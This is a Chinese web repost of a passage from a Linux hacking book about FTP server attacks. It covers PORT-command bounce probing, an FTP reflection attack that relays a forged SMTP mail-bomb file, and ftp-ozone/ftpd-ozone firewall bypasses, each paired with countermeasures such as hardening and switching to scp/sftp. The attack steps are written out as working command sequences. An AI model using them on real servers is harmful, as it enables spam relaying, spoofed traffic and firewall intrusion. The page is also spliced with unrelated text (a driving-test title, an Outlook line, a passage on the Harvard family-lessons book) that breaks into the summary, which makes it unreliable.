b2科目四模拟试题多少题驾考考爆了怎么补救
b2科目四模拟试题多少题 驾考考爆了怎么补救

Linux黑客大曝光(4)

电脑杂谈  发布时间:2019-05-31 16:10:39  来源:网络整理

PASS password

PORT 127,0,0,1,10,10

LIST

QUIT

#nc ftpserver 21

如果出现'425 Can't build data connection:Connection refused'这一行信息说明例中的服务器易

于受到攻击。说明服务器确实尝试过连接PORT中所指的主机/端口。多数配置正确的服务

器将给出不同的出错信息,或直接断开连接。

启用第三方FTP

允许任意使用PORT命令会带来某些问题,以某种巧妙的方式使用PORT AND PASV,可以

linux fork _邮件 linux_outlook邮件撤回邮件不能用

使FTP客户端某个服务器上的数据直接发送到另一个FTP服务器上,数据无需流经控制这

一操作的机器。Xftp支持这一功能。

FTP反射攻击

如果黑客能够向服务器上载文件,那他就可以使用PORT AND RETR命令传送任何数据。

例如有一个可写的incoming目录

hacker$cat anonymous_mail.smtp

HELO FTPSERVER.EXAMPLE.COM

mail from :user@some_host.com

rcpt to:mailbomb_recipient@other_host.com

data

....

hacker$ncftpput ftpserver incoming anonymous_mail.smtp

hacker$nc ftpserver 21

USER anonymous

PASS ftp@example.com

PORT 10,10,10,10,0,25

RETR anonymous_mail.smtp

QUIT

FTP服务器将把anonymous_mail.smtp文件发送到邮件服务器10.10.10.10 的SMTP(25)端口,

该文件被设计成正确的SMTP命令,并且邮件服务器认为FTP服务器就是连接的源机器,

有效防止它确定邮件真实来源的可能性。利用这种方法还可以攻击其它网络服务,POP,IMAP

OR lpd。些时,FTP服务器被认为是攻击源,而黑客就高枕无忧了。

对策:

限制服务器接收任意的PORT命令。确保jail目录下不存在所有人都可写的目录或文件。假

设FTP帐号用户ID为100组ID为200。则可使用下面命令找出这些文件

ftpserver# cd /path/to/jail

ftpserver# find . \( -user 100 -o -group 200 -o -perm -002 \) -a -ls

禁用SITE CHMOD命令,可限制用户把文件许可改为可写。

更好的办法是确保FTP区域不中存在属于匿名用户或能被其写入的文件。

对防火墙之后的FTP服务器端口的非授权访问

通常FTP服务器处于防火墙之后,并阻塞所有除FTP之外的所有访问。在FTP服务器发送

PASV之后,防火墙必须为数据连接打开给定的端口,并在传输完成后关闭它,但多数防火

墙并不保持会话的真实状态。而且会被欺骗打开端口。ftp-ozone脚本可用于攻击这种情况。

hacker$ftp-ozone ftpserver.example.com 79 &

hacker$nc ftpserver.example.com 79

对策:

用ftp-ozone测试FTP服务器。升级防火墙,此外ip_masq_ftp模块不再存此漏洞。或配置

服务器不使用PASV FTP。

对防火墙之后的FTP客户端端口的非授权访问

防火墙要想支持主动FTP,就必须提供方法转换PORT地址中的地址,并在防火墙外侧绑定

端口,然后将其正确地对应到实际的FTP客户端。如果不保护连接状态的完整记录,做到

这一点不容量,很多开发商选择绕过这一点选择更快的处理速度。黑客可以利用这一点欺骗

客户端,使用其发送伪造的PORT命令,就可以穿透防火墙与FTP客户端的任何端口建立

连接。

Ftpd-ozone脚本提供了一个用于欺骗防火墙的特制URL,将其发给客户,客户一旦单击这

个链接,FTP服务器所在机器就能连向位于防火墙之后的客户端。

对策:

用Ftpd-ozone脚本测试服务器,升级防火墙。ip_masq_ftp没有这个问题。使用PASV FTP。

使用Aftpd代替匿名FTP,编译时指定DREADONLY,它将只提供文件下载服务。而不能上传

文件。出连连接不使用20端口,即服务器不需要任何root权限。惟一在服务器外运行的命

令是/bin/ls。

Publicfile可作http and 匿名ftp服务器,安全性极高。它不支持任何有问题的传统功能(SITE

EXEC等),并对PORT AND PASV命令提供了适当的保护。而且不运行任何外部命令,包

括/bin/ls。

小结

sendmail是使用最广的邮件服务器,但保障其安全不是件容量的事情,所以应了解它的基础

聪明的人是吸取自己的教训,智慧的人是吸取别人的教训。男:相信我们每个人都能从自己、别人三十年的经历中吸取一点教训、受到几丝启发、收获若干知识,得到一些感想。《哈佛家训》这本书蕴藏着十分多的道理,不仅让我吸取到了不少知识与教训,也让我明白了做人的原则。

置,并且在设计时就考虑了安全性。但它们的使用不如sendmail广。资料相对较少。

主动和被动的FTP服务器都存在问题,最好的方法是不使用FTP服务器。如需支持匿名ftp

文件下载,应当运行WEB服务器。如Publicfile。如果服务器的用户必须上传文件,应当使

用scp or sftp来到代FTP。它们是SSH的组成部份。scp是一个安全的命令行复制程序,sftp

本质上与之相同,但拥有一个类似于ftp的交互界面。这两个程序可以保护口令免遭嗅探,

并且确保数据不会被攻击者破坏。

第十二章 Web服务和动态页面

生成HTTP请求

machine$telnet localhost 80

输入

HEAD / HTTP/1.0

它向服务器请求其文档树根目录“/”的头部信息。

头部信息会给黑客提供一些有用的信息,如服务器版本,操作系统,安装的模块等。

可以修改默认的头部信息以防止信息泄露。


本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-102690-4.html

相关阅读
    发表评论  请自觉遵守互联网相关的政策法规,严禁发布、暴力、反动的言论

    热点图片
    拼命载入中...